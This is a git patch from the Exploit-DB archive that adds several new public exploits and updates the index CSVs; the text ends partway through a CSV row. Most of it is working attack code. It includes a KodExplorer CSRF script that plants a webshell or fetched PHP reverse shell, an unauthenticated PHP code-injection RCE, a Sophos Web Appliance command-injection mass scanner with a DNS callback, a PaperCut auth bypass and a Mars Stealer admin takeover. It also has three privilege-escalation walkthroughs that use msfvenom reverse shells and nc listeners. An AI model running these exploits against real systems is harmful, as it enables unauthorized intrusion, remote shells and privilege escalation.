From 7e3a257da82301e993b361fdf6b2681b962cfc4b Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Wed, 26 Apr 2023 00:16:27 +0000 Subject: [PATCH] DB: 2023-04-26 11 changes to exploits/shellcodes/ghdb PaperCut NG/MG 22.0.4 - Authentication Bypass KodExplorer 4.49 - CSRF to Arbitrary File Upload Mars Stealer 8.3 - Admin Account Takeover Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution Sophos Web Appliance 4.3.10.4 - Pre-auth command injection Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path OCS Inventory NG 2.3.0.0 - Unquoted Service Path Wondershare Filmora 12.2.9.2233 - Unquoted Service Path Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode --- exploits/multiple/webapps/51391.py | 40 ++++++++ exploits/php/webapps/51388.py | 122 ++++++++++++++++++++++++ exploits/php/webapps/51392.py | 27 ++++++ exploits/php/webapps/51394.py | 28 ++++++ exploits/php/webapps/51396.sh | 94 +++++++++++++++++++ exploits/windows/local/51389.txt | 84 +++++++++++++++++ exploits/windows/local/51393.txt | 80 ++++++++++++++++ exploits/windows/local/51395.txt | 69 ++++++++++++++ files_exploits.csv | 8 ++ files_shellcodes.csv | 1 + shellcodes/windows/51390.asm | 146 +++++++++++++++++++++++++++++ 11 files changed, 699 insertions(+) create mode 100755 exploits/multiple/webapps/51391.py create mode 100755 exploits/php/webapps/51388.py create mode 100755 exploits/php/webapps/51392.py create mode 100755 exploits/php/webapps/51394.py create mode 100755 exploits/php/webapps/51396.sh create mode 100644 exploits/windows/local/51389.txt create mode 100644 exploits/windows/local/51393.txt create mode 100644 exploits/windows/local/51395.txt create mode 100644 shellcodes/windows/51390.asm diff --git a/exploits/multiple/webapps/51391.py b/exploits/multiple/webapps/51391.py new file mode 100755 index 000000000..eac9f8c58 --- /dev/null +++ b/exploits/multiple/webapps/51391.py @@ -0,0 +1,40 @@ +# Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass +# Date: 21 April 2023 +# Exploit Author: MaanVader +# Vendor Homepage: https://www.papercut.com/ +# Version: 8.0 or later +# Tested on: 22.0.4 +# CVE: CVE-2023-27350 + +import requests +from bs4 import BeautifulSoup +import re + +def vuln_version(): + ip = input("Enter the ip address: ") + url = "http://"+ip+":9191"+"/app?service=page/SetupCompleted" + response = requests.get(url) + soup = BeautifulSoup(response.text, 'html.parser') + text_div = soup.find('div', class_='text') + product_span = text_div.find('span', class_='product') + + # Search for the first span element containing a version number + version_span = None + for span in text_div.find_all('span'): + version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip()) + if version_match: + version_span = span + break + + if version_span is None: + print('Not Vulnerable') + else: + version_str = version_span.text.strip() + print('Version:', version_str) + print("Vulnerable version") + print(f"Step 1 visit this url first in your browser: {url}") + print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard") + + +if __name__ =="__main__": + vuln_version() \ No newline at end of file diff --git a/exploits/php/webapps/51388.py b/exploits/php/webapps/51388.py new file mode 100755 index 000000000..2279f1fbf --- /dev/null +++ b/exploits/php/webapps/51388.py @@ -0,0 +1,122 @@ +# Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload +# Date: 21/04/2023 +# Exploit Author: MrEmpy +# Software Link: https://github.com/kalcaddle/KodExplorer +# Version: <= 4.49 +# Tested on: Linux +# CVE ID: CVE-2022-4944 +# References: +# * https://vuldb.com/?id.227000 +# * https://www.cve.org/CVERecord?id=CVE-2022-4944 +# * https://github.com/MrEmpy/CVE-2022-4944 + +import argparse +import http.server +import socketserver +import os +import threading +import requests +from time import sleep + +def banner(): + print(''' + _ _____________ _____ _ ______ _____ + _____ +| | / / _ | _ \ ___| | | | ___ \/ __ \| + ___| +| |/ /| | | | | | | |____ ___ __ | | ___ _ __ ___ _ __ | |_/ /| / \/| +|__ +| \| | | | | | | __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| | / | | | + __| +| |\ \ \_/ / |/ /| |___> <| |_) | | (_) | | | __/ | | |\ \ | \__/\| +|___ +\_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_| \___|_| \_| \_| +\____/\____/ + | | + + |_| + + [KODExplorer <= v4.49 Remote Code Executon] + [Coded by MrEmpy] + +''') + +def httpd(): + port = 8080 + httpddir = os.path.join(os.path.dirname(__file__), 'http') + os.chdir(httpddir) + Handler = http.server.SimpleHTTPRequestHandler + httpd = socketserver.TCPServer(('', port), Handler) + print('[+] HTTP Server started') + httpd.serve_forever() + + +def webshell(url, lhost): + payload = '
' + path = '/data/User/admin/home/' + + targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ') + wshell_f = open('http/shell.php', 'w') + wshell_f.write(payload) + wshell_f.close() + print('[*] Opening HTTPd port') + th = threading.Thread(target=httpd) + th.start() + print(f'[+] Send this URI to your target: +{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http:// +{lhost}:8080/shell.php&uuid=&time=') + print(f'[+] After the victim opens the URI, his shell will be hosted at +{url}/data/User/admin/home/shell.php?cmd=whoami') + +def reverseshell(url, lhost): + rvpayload = ' +https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php +' + path = '/data/User/admin/home/' + + targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ') + lport = input('[*] Your local port: ') + reqpayload = requests.get(rvpayload).text + reqpayload = reqpayload.replace('127.0.0.1', lhost) + reqpayload = reqpayload.replace('1234', lport) + wshell_f = open('http/shell.php', 'w') + wshell_f.write(reqpayload) + wshell_f.close() + print('[*] Opening HTTPd port') + th = threading.Thread(target=httpd) + th.start() + print(f'[+] Send this URI to your target: +{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http:// +{lhost}:8080/shell.php&uuid=&time=') + input(f'[*] Run the command "nc -lnvp {lport}" to receive the +connection and press any key\n') + while True: + hitshell = requests.get(f'{url}/data/User/admin/home/shell.php') + sleep(1) + if not hitshell.status_code == 200: + continue + else: + print('[+] Shell sent and executed!') + break + + +def main(url, lhost, mode): + banner() + if mode == 'webshell': + webshell(url, lhost) + elif mode == 'reverse': + reverseshell(url, lhost) + else: + print('[-] There is no such mode. Use webshell or reverse') + + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + parser.add_argument('-u','--url', action='store', help='target url', +dest='url', required=True) + parser.add_argument('-lh','--local-host', action='store', help='local +host', dest='lhost', required=True) + parser.add_argument('-m','--mode', action='store', help='mode +(webshell, reverse)', dest='mode', required=True) + arguments = parser.parse_args() + main(arguments.url, arguments.lhost, arguments.mode) \ No newline at end of file diff --git a/exploits/php/webapps/51392.py b/exploits/php/webapps/51392.py new file mode 100755 index 000000000..8e1b75fd1 --- /dev/null +++ b/exploits/php/webapps/51392.py @@ -0,0 +1,27 @@ +# Exploit Title: Mars Stealer 8.3 - Admin Account Takeover +# Product: Mars Stelaer +# Technology: PHP +# Version: < 8.3 +# Google Dork: N/A +# Date: 20.04.2023 +# Tested on: Linux +# Author: Sköll - twitter.com/s_k_o_l_l + + +import argparse +import requests + +parser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit') +parser.add_argument('-u', '--url', required=True, help='Example: python3 exploit.py -u http://localhost/') +args = parser.parse_args() + +url = args.url.rstrip('/') + '/includes/settingsactions.php' +headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Sköll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"} +data = {"func": "savepwd", "pwd": "sköll"} #change password +response = requests.post(url, headers=headers, data=data) + +if response.status_code == 200: + print("Succesfull!") + print("New Password: " + data["pwd"]) +else: + print("Exploit Failed!") \ No newline at end of file diff --git a/exploits/php/webapps/51394.py b/exploits/php/webapps/51394.py new file mode 100755 index 000000000..92a80cbac --- /dev/null +++ b/exploits/php/webapps/51394.py @@ -0,0 +1,28 @@ +# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE) +# Date: 4/23/2023 +# Author: Or4nG.M4n +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html +# Version: 1.0 +# Tested on: windows +# +# Vuln File : SystemSettings.php < here you can inject php code +# if(isset($_POST['content'])){ +# foreach($_POST['content'] as $k => $v) +# file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want +# } +# Vuln File : home.php < here you can include and execute you're php code +#

Welcome

+#
+#
+# <=== include +#
+ +import requests + +url = input("Enter url :") +postdata = {'content[welcome]':'"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>'} +resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata) +print("[+] injection in welcome page") +print("[+]"+url+"/?cmd=ls -al") +print("\n") \ No newline at end of file diff --git a/exploits/php/webapps/51396.sh b/exploits/php/webapps/51396.sh new file mode 100755 index 000000000..01f9573e6 --- /dev/null +++ b/exploits/php/webapps/51396.sh @@ -0,0 +1,94 @@ +#!/bin/bash +# Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection +# Exploit Author: Behnam Abasi Vanda +# Vendor Homepage: https://www.sophos.com +# Version: Sophos Web Appliance older than version 4.3.10.4 +# Tested on: Ubuntu +# CVE : CVE-2023-1671 +# Shodan Dork: title:"Sophos Web Appliance" +# Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce +# Reference : https://vulncheck.com/blog/cve-2023-1671-analysis + + + +TARGET_LIST="$1" + +# ===================== +BOLD="\033[1m" +RED="\e[1;31m" +GREEN="\e[1;32m" +YELLOW="\e[1;33m" +BLUE="\e[1;34m" +NOR="\e[0m" +# ==================== + + +get_new_subdomain() +{ +cat MN.txt | grep 'YES' >/dev/null;ch=$? + if [ $ch -eq 0 ];then + echo -e " [+] Trying to get Subdomain $NOR" + rm -rf cookie.txt + sub=`curl -i -c cookie.txt -s -k -X $'GET' \ + -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \ + $'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn` + echo -e " [+]$BOLD$GREEN Subdomain : $sub $NOR" + fi +} + +check_vuln() +{ +curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)" + +req=`curl -i -s -k -b cookie.txt -X $'GET' \ + -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \ + $'http://www.dnslog.cn/getrecords.php?t=0'` + +echo "$req" | grep 'dnslog.cn' >/dev/null;ch=$? + if [ $ch -eq 0 ];then + echo "YES" > MN.txt + echo -e " [+]$BOLD $RED https://$1 Vulnerable :D $NOR" + echo "https://$1" >> vulnerable.lst + else + echo -e " [-] https://$1 Not Vulnerable :| $NOR" + echo "NO" > MN.txt + fi +} + +echo ' + + ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██████╗███████╗ +██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ███║██╔════╝╚════██║ +██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗ ██╔╝ +██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝ ██║██╔═══██╗ ██╔╝ +╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║╚██████╔╝ ██║ + ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝ ╚═════╝ ╚═╝ + +██████╗ ██╗ ██╗ ██████╗ ███████╗██╗ ██╗███╗ ██╗ █████╗ ███╗ ███╗ ██╗ +██╔══██╗╚██╗ ██╔╝ ██╔══██╗██╔════╝██║ ██║████╗ ██║██╔══██╗████╗ ████║ ██╗╚██╗ +██████╔╝ ╚████╔╝ ██████╔╝█████╗ ███████║██╔██╗ ██║███████║██╔████╔██║ ╚═╝ ██║ +██╔══██╗ ╚██╔╝ ██╔══██╗██╔══╝ ██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║ ▄█╗ ██║ +██████╔╝ ██║ ██████╔╝███████╗██║ ██║██║ ╚████║██║ ██║██║ ╚═╝ ██║ ▀═╝██╔╝ +╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ + + ' +if test "$#" -ne 1; then + echo " ----------------------------------------------------------------" + echo " [!] please give the target list file : bash CVE-2023-1671.sh targets.txt " + echo " ---------------------------------------------------------------" + exit +fi + + + +rm -rf cookie.txt +echo "YES" > MN.txt +for target in `cat $TARGET_LIST` +do + +get_new_subdomain; +echo " [~] Checking $target" + check_vuln "$target" +done +rm -rf MN.txt +rm -rf cookie.txt \ No newline at end of file diff --git a/exploits/windows/local/51389.txt b/exploits/windows/local/51389.txt new file mode 100644 index 000000000..19723bdce --- /dev/null +++ b/exploits/windows/local/51389.txt @@ -0,0 +1,84 @@ +##################################################################### +# # +# Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path # +# Date: 2023/04/21 # +# Exploit Author: msd0pe # +# Vendor Homepage: https://oscinventory-ng.org # +# Software Link: https://github.com/OCSInventory-NG/WindowsAgent # +# My Github: https://github.com/msd0pe-1 # +# Fixed in version 2.3.1.0 # +# # +##################################################################### + +OCS Inventory NG Windows Agent: +Versions below 2.3.1.0 contains an unquoted service path which allows attackers to escalate privileges to the system level. + +[1] Find the unquoted service path: + > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ + + OCS Inventory Service OCS Inventory Service C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe Auto + +[2] Get informations about the service: + > sc qc "OCS Inventory Service" + + [SC] QueryServiceConfig SUCCESS + + SERVICE_NAME: OCS Inventory Service + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : OCS Inventory Service + DEPENDENCIES : RpcSs + : EventLog + : Winmgmt + : Tcpip + SERVICE_START_NAME : LocalSystem + +[3] Generate a reverse shell: + > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe + +[4] Upload the revese shell to C:\Program Files (x86)\OCS.exe + > put OCS.exe + > ls + drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 . + drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 .. + drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Common Files + -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini + drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer + drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft + drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET + drw-rw-rw- 0 Sat Apr 22 04:51:20 2023 OCS Inventory Agent + -rw-rw-rw- 7168 Sat Apr 22 05:20:38 2023 OCS.exe + drw-rw-rw- 0 Sat Apr 22 03:24:58 2023 Windows Defender + drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Mail + drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player + drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform + drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT + drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer + drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices + drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar + drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell + +[5] Start listener + > nc -lvp 4444 + +[6] Reboot the service/server + > sc stop "OCS Inventory Service" + > sc start "OCS Inventory Service" + + OR + + > shutdown /r + +[7] Enjoy ! + 192.168.1.102: inverse host lookup failed: Unknown host + connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 + Microsoft Windows [Version 10.0.19045.2130] + (c) Microsoft Corporation. All rights reserved. + + C:\Windows\system32>whoami + + nt authority\system \ No newline at end of file diff --git a/exploits/windows/local/51393.txt b/exploits/windows/local/51393.txt new file mode 100644 index 000000000..9f7c6403d --- /dev/null +++ b/exploits/windows/local/51393.txt @@ -0,0 +1,80 @@ +########################################################################## +# # +# Exploit Title: Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path # +# Date: 2023/04/22 # +# Exploit Author: msd0pe # +# Vendor Homepage: https://www.arcsoft.com/ # +# My Github: https://github.com/msd0pe-1 # +# # +########################################################################## + +Arcsoft PhotoStudio: +Versions =< 6.0.0.172 contains an unquoted service path which allows attackers to escalate privileges to the system level. + +[1] Find the unquoted service path: + > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ + + ArcSoft Exchange Service ADExchange C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe Auto + +[2] Get informations about the service: + > sc qc "ADExchange" + + [SC] QueryServiceConfig SUCCESS + + SERVICE_NAME: ADExchange + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : ArcSoft Exchange Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +[3] Generate a reverse shell: + > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Common.exe + +[4] Upload the reverse shell to C:\Program Files (x86)\Common.exe + > put Commom.exe + > ls + drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 . + drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 .. + drw-rw-rw- 0 Sun Apr 23 03:55:37 2023 ArcSoft + drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 Common Files + -rw-rw-rw- 7168 Sun Apr 23 04:10:25 2023 Common.exe + -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini + drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 InstallShield Installation Information + drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer + drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft + drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET + drw-rw-rw- 0 Sat Apr 22 05:48:20 2023 Windows Defender + drw-rw-rw- 0 Sat Apr 22 05:46:44 2023 Windows Mail + drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player + drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform + drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT + drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer + drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices + drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar + drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell + +[5] Start listener + > nc -lvp 4444 + +[6] Reboot the service/server + > sc stop "ADExchange" + > sc start "ADExchange" + + OR + + > shutdown /r + +[7] Enjoy ! + 192.168.1.102: inverse host lookup failed: Unknown host + connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 + Microsoft Windows [Version 10.0.19045.2130] + (c) Microsoft Corporation. All rights reserved. + + C:\Windows\system32>whoami + + nt authority\system \ No newline at end of file diff --git a/exploits/windows/local/51395.txt b/exploits/windows/local/51395.txt new file mode 100644 index 000000000..d3f4ffe6f --- /dev/null +++ b/exploits/windows/local/51395.txt @@ -0,0 +1,69 @@ +############################################################################ +# # +# Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path # +# Date: 2023/04/23 # +# Exploit Author: msd0pe # +# Vendor Homepage: https://www.wondershare.com # +# My Github: https://github.com/msd0pe-1 # +# # +############################################################################ + +Wondershare Filmora: +Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level. + +[1] Find the unquoted service path: + > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ + +Wondershare Native Push Service NativePushService C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe Auto + +[2] Get informations about the service: + > sc qc "NativePushService" + + [SC] QueryServiceConfig SUCCESS + + SERVICE_NAME: NativePushService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Wondershare Native Push Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +[3] Generate a reverse shell: + > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe + +[4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe + > put Wondershare.exe + > ls + drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 . + drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 .. + drw-rw-rw- 0 Sun Apr 23 14:36:26 2023 Wondershare Filmora Update + drw-rw-rw- 0 Sun Apr 23 14:37:13 2023 Wondershare NativePush + -rw-rw-rw- 7168 Sun Apr 23 14:51:47 2023 Wondershare.exe + drw-rw-rw- 0 Sun Apr 23 13:52:30 2023 WSHelper + + +[5] Start listener + > nc -lvp 4444 + +[6] Reboot the service/server + > sc stop "NativePushService" + > sc start "NativePushService" + + OR + + > shutdown /r + +[7] Enjoy ! + 192.168.1.102: inverse host lookup failed: Unknown host + connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 + Microsoft Windows [Version 10.0.19045.2130] + (c) Microsoft Corporation. All rights reserved. + + C:\Windows\system32>whoami + + nt authority\system \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b5ab33323..b69192352 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -12003,6 +12003,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5 51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,, +51391,exploits/multiple/webapps/51391.py,"PaperCut NG/MG 22.0.4 - Authentication Bypass",2023-04-25,MaanVader,webapps,multiple,,2023-04-25,2023-04-25,0,CVE-2023-27350,,,,, 35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt 50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,, 51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,, @@ -22061,6 +22062,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28318,exploits/php/webapps/28318.txt,"Knusperleicht Quickie - 'Quick_Path' Remote File Inclusion",2006-08-01,"Kurdish Security",webapps,php,,2006-08-01,2013-09-16,1,CVE-2006-3982;OSVDB-29077,,,,,https://www.securityfocus.com/bid/19271/info 29294,exploits/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection",2006-12-18,IMHOT3B,webapps,php,,2006-12-18,2013-10-30,1,CVE-2006-6721;OSVDB-31516,,,,,https://www.securityfocus.com/bid/21637/info 23384,exploits/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion",2003-11-17,"RusH security team",webapps,php,,2003-11-17,2012-12-14,1,,,,,,https://www.securityfocus.com/bid/9054/info +51388,exploits/php/webapps/51388.py,"KodExplorer 4.49 - CSRF to Arbitrary File Upload",2023-04-25,"Mr Empy",webapps,php,,2023-04-25,2023-04-25,0,CVE-2022-4944,,,,, 37388,exploits/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4632;OSVDB-123654;OSVDB-123653,,,,http://www.exploit-db.comKoha-3.20.00.zip, 37389,exploits/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2016-08-31,0,CVE-2015-4631;CVE-2015-4630,,,,http://www.exploit-db.comKoha-3.20.00.zip, 37387,exploits/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4633;OSVDB-123650,,,,http://www.exploit-db.comKoha-3.20.00.zip, @@ -22887,6 +22889,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 13927,exploits/php/webapps/13927.txt,"MarketSaz - Arbitrary File Upload",2010-06-18,NetQurd,webapps,php,,2010-06-17,,0,,,,,, 26838,exploits/php/webapps/26838.txt,"MarmaraWeb E-Commerce - 'index.php?page' Cross-Site Scripting",2005-12-15,B3g0k,webapps,php,,2005-12-15,2013-07-15,1,CVE-2005-4288;OSVDB-21902,,,,,https://www.securityfocus.com/bid/15875/info 26841,exploits/php/webapps/26841.txt,"MarmaraWeb E-Commerce - Remote File Inclusion",2005-12-15,B3g0k,webapps,php,,2005-12-15,2013-07-15,1,CVE-2005-4287;OSVDB-21903,,,,,https://www.securityfocus.com/bid/15877/info +51392,exploits/php/webapps/51392.py,"Mars Stealer 8.3 - Admin Account Takeover",2023-04-25,Sköll,webapps,php,,2023-04-25,2023-04-25,0,,,,,, 26899,exploits/php/webapps/26899.txt,"Marwel 2.7 - 'index.php' SQL Injection",2005-12-19,r0t,webapps,php,,2005-12-19,2013-07-17,1,CVE-2005-4403;OSVDB-21831,,,,,https://www.securityfocus.com/bid/15959/info 11329,exploits/php/webapps/11329.txt,"MASA2EL Music City 1.0 - SQL Injection",2010-02-04,alnjm33,webapps,php,,2010-02-03,,1,OSVDB-62133;CVE-2010-1047,,,,, 32732,exploits/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' SQL Injection",2009-01-15,Pouya_Server,webapps,php,,2009-01-15,2014-04-08,1,OSVDB-105743,,,,,https://www.securityfocus.com/bid/33309/info @@ -23530,6 +23533,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 12223,exploits/php/webapps/12223.txt,"Multi-Mirror - Arbitrary File Upload",2010-04-14,indoushka,webapps,php,,2010-04-13,,1,,,,,, 5630,exploits/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 - Insecure Cookie Handling",2008-05-15,t0pP8uZz,webapps,php,,2008-05-14,,1,OSVDB-45336;CVE-2008-2293,,,,, 50739,exploits/php/webapps/50739.txt,"Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection",2022-02-16,"Saud Alenazi",webapps,php,,2022-02-16,2022-02-16,0,,,,,, +51394,exploits/php/webapps/51394.py,"Multi-Vendor Online Groceries Management System 1.0 - Remote Code 